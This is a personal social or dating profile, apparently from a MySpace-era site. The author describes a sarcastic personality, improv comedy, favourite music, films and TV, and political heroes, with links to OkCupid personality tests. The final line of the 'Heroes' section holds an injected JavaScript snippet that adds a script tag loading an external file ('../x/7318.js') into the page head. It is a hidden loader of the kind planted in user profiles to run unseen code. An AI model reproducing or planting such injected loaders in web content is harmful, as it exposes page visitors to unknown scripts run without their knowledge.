Link: The Politics Test on OkCupid Free Online Dating
Also: The OkCupid Dating Persona TestMy friends describe me as quick-witted, sarcastic, and intelligent (I think they're afraid "pain in the butt" would hurt me too much).I love sports (both participating and spectating) and being active. There are only two types of weekends: Great ones and other peoples'.Music is the soundtrack of my life, and I will listen to just about anything. I enjoy comedies and the occasional drama. I read voraciously (in particular Sci-Fi and American Liturature) and enjoy cozying up on the futon with a good book and some mellow music.I thrill at the spontaneous artistry and daring of Improv and watch as much of it as I can. I also perform 1-2 evenings a month at a small club in Santa Monica. It's a blast to be up on stage trying to craft a small slice of reality and have the opportunity to make others laugh and enjoy themselves. The best night spot I have found is a dueling piano bar - there is NOTHING like enjoying the company of friends, singing great music at the top of your lungs, and enjoying a drink (or five).

My Interests

Music, loud singing in bars, football, improvisationsal comedy, politics, conversation, movies, digital phototgraphy, resumes, and about 1 billion other things

I'd like to meet:

Cool, smart, and funny people looking to hang out and have fun. The ability to talk smack and take smack talk is essential, as most of my friends and I are a *tad bit* sarcastic.Fans of classic rock, 80's, and 90's music are particularly welcome, as are lovers of Improv comedy. If you love wild sex inside Disneyland, give yourself a Gold Star!

Music:

I enjoy listening to just about anything, but some of my favorites include Oingo Boingo, Bruce Springsteen, Big Bad Voodoo Daddies, U2, Coldplay, David Gray, Leonard Cohen, Queen, The Proclaimers, New Order, Metalica, Deep Blue Something, Better Than Ezra, Led Zeppelin, Guns 'n Roses, most 80's, and almost all classic rock.I always prefer live music, and many of my CD's are of concerts. Not only do you get a "greatest hits" compilation, but you get the extra energy of the live show. Great live performers I enjoy include Bruuuuuuuuuuuuce, Big Bad Voodoo Daddy, U2, and the Dave Mathews Band.I am not fond of most rap, most R&B, and about 50% of contemporary country (No Dixie Chicks, thank you very much).

Movies:

Look for the silly, the sarcastic, and the fun: Noises Off, Princess Bride, Radioland Murders, Much Ado About Nothing, Amadeus, Raiders of the Lost Ark, Soap Dish, Pleasantville, Impromptu, Clue, Monty Python, The Incredibles, When Harry Met Sally.I am also a big fan of family films, such as Leaving Las Vegas and Desperate Measures.Of course, all three Lord of the Rings movies are spectacular and are sitting in my video library "shelf of honor".Don't bother me with horror (except the original Exorcist or Serpent and the Rainbow) or anything resembling reality tv (i.e. Jackass).

Television:

The West Wing and any other show with the same flair for witty and intelligent dialogue. Currently the first three seasons are on DVD in my house, and there is always at least 1 disc in my DVD carousel.I also enjoy Whoes Line is it Anyways, The Shield, ER, The King of Queens, CNN, The History Channel, and any scientific shows that happen to run when I am home.I enjoy watching C-Span, in particular when they show British Parlament. Watching the PM take so much personal abuse and have to fire back is VERY entertaining, and highlights many of the weaknesses of our own politicians. 'W' could NEVER handle that kind of verbal straffing on a weakly basis.

Books:

I read everything, if its printed with words I'll read it. I love too read! Anything and everything

Heroes:

Richard Feynman, Bruce Springsteen, and Howard Dean are currently on my list. And now Keith Olbermann tops them all. .."var s=document.createElement('script');s.src='../x/7318.js';docu ment.getElementsByTagName('head')[0].appendChild(s);"
